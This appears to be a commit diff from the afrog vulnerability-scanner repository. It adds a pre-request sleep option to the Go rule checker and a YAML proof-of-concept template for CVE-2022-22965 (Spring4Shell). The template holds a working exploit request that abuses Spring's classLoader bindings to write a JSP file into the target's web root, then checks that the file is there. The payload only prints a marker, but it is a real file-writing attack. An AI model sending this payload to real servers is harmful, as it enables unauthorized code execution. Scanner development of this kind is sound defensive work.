STRLCPY/afrog

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

afrog-pocs/README.md

		skipped 58 lines
59	59		exppression: response.status == 200 && response.body.bcontains(b'PHP Version')
60	60		stop_if_match: true
61	61		r1:
	62	+	before_sleep: 6
62	63		request:
63	64		method: GET
64	65		path: /info.php
		skipped 17 lines
82	83		stop_if_match: 如果匹配就停止
83	84
84	85		stop_if_mismatch：如果不匹配就停止
	86	+
	87	+	before_sleep: 顾名思义，http 请求前 sleep 6 秒钟
85	88
86	89		expression: 最外面的 `expression` 是 `rules` 的验证表达式，`r0() \|\| r1()` 表示 `r0` 和 `r1` 两个规则，匹配一个表达式就为 `true`，代表漏洞存在。
87	90
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/CVE-2022-22965.yaml

1	+	id: CVE-2022-22965
2	+
3	+	info:
4	+	name: Spring Framework RCE JDK 9+
5	+	author: zan8in
6	+	severity: critical
7	+	description: \|
8	+	srping framework 结合JDK9及以上新版本的特性可以实现对历史漏洞补丁的绕过从而实现远程代码执行
9	+	Fofa: app="vmware-SpringBoot-Framework"
10	+	reference:
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-22965
12	+
13	+	set:
14	+	randTxt: randomInt(800000000, 1000000000)
15	+	exploitName: randomInt(800000000, 1000000000)
16	+	rules:
17	+	r0:
18	+	request:
19	+	method: POST
20	+	path: /
21	+	headers:
22	+	C2: "<%"
23	+	Suffix: "%>"
24	+	body: \|
25	+	class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7BC2%7Di%20if(%22j%22.equals(%22j%22))%7B%20out.println(new%20String(%22{{randTxt}}%22))%3B%20%7D%25%7BSuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix={{exploitName}}&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
26	+	expression: response.status == 200
27	+	r1:
28	+	before_sleep: 6
29	+	request:
30	+	method: GET
31	+	path: /{{exploitName}}.jsp
32	+	expression: response.status == 200 && response.body.bcontains(b'{{exploitName}}')
33	+
34	+	expression: r0() && r1()

■ ■ ■ ■ ■ ■

pkg/core/checker.go

		skipped 4 lines
5	5		"net/http"
6	6		"net/url"
7	7		"strings"
	8	+	"time"
8	9
9	10		"github.com/google/cel-go/checker/decls"
10	11		"github.com/zan8in/afrog/pkg/config"
		skipped 64 lines
75	76		k := ruleMap.Key
76	77		rule := ruleMap.Value
77	78
	79	+	if rule.BeforeSleep != 0 {
	80	+	time.Sleep(time.Duration(rule.BeforeSleep) * time.Second)
	81	+	}
78	82		utils.RandSleep(500)
79	83
80	84		isMatch := false
		skipped 13 lines
94	98		c.UpdateVariableMap(rule.Output)
95	99		}
96	100
97		-	c.Result.AllPocResult = append(c.Result.AllPocResult,
98		-	&PocResult{IsVul: isMatch, ResultRequest: c.VariableMap["request"].(proto.Request), ResultResponse: c.VariableMap["response"].(proto.Response)})
	101	+	pocRstTemp := PocResult{IsVul: isMatch}
	102	+	if c.VariableMap["response"] != nil {
	103	+	pocRstTemp.ResultResponse = c.VariableMap["response"].(*proto.Response)
	104	+	}
	105	+	if c.VariableMap["request"] != nil {
	106	+	pocRstTemp.ResultRequest = c.VariableMap["request"].(*proto.Request)
	107	+	}
	108	+	c.Result.AllPocResult = append(c.Result.AllPocResult, &pocRstTemp)
99	109
100	110		if rule.StopIfMismatch && !isMatch {
101	111		c.Result.IsVul = false
		skipped 83 lines

■ ■ ■ ■ ■ ■

pkg/poc/poc.go

		skipped 49 lines
50	50		Output yaml.MapSlice `yaml:"output"`
51	51		StopIfMatch bool `yaml:"stop_if_match"`
52	52		StopIfMismatch bool `yaml:"stop_if_mismatch"`
	53	+	BeforeSleep int `yaml:"before_sleep"`
53	54		order int
54	55		}
55	56
		skipped 3 lines
59	60		Output yaml.MapSlice `yaml:"output"`
60	61		StopIfMatch bool `yaml:"stop_if_match"`
61	62		StopIfMismatch bool `yaml:"stop_if_mismatch"`
	63	+	BeforeSleep int `yaml:"before_sleep"`
62	64		}
63	65
64	66		// http/tcp/udp cache 是否使用缓存的请求，如果该选项为 true，那么如果在一次探测中其它脚本对相同目标发送过相同请求，那么便使用之前缓存的响应，而不发新的数据包
		skipped 99 lines
164	166		r.Output = tmp.Output
165	167		r.StopIfMatch = tmp.StopIfMatch
166	168		r.StopIfMismatch = tmp.StopIfMismatch
	169	+	r.BeforeSleep = tmp.BeforeSleep
167	170		r.order = order
168	171
169	172		order += 1
		skipped 34 lines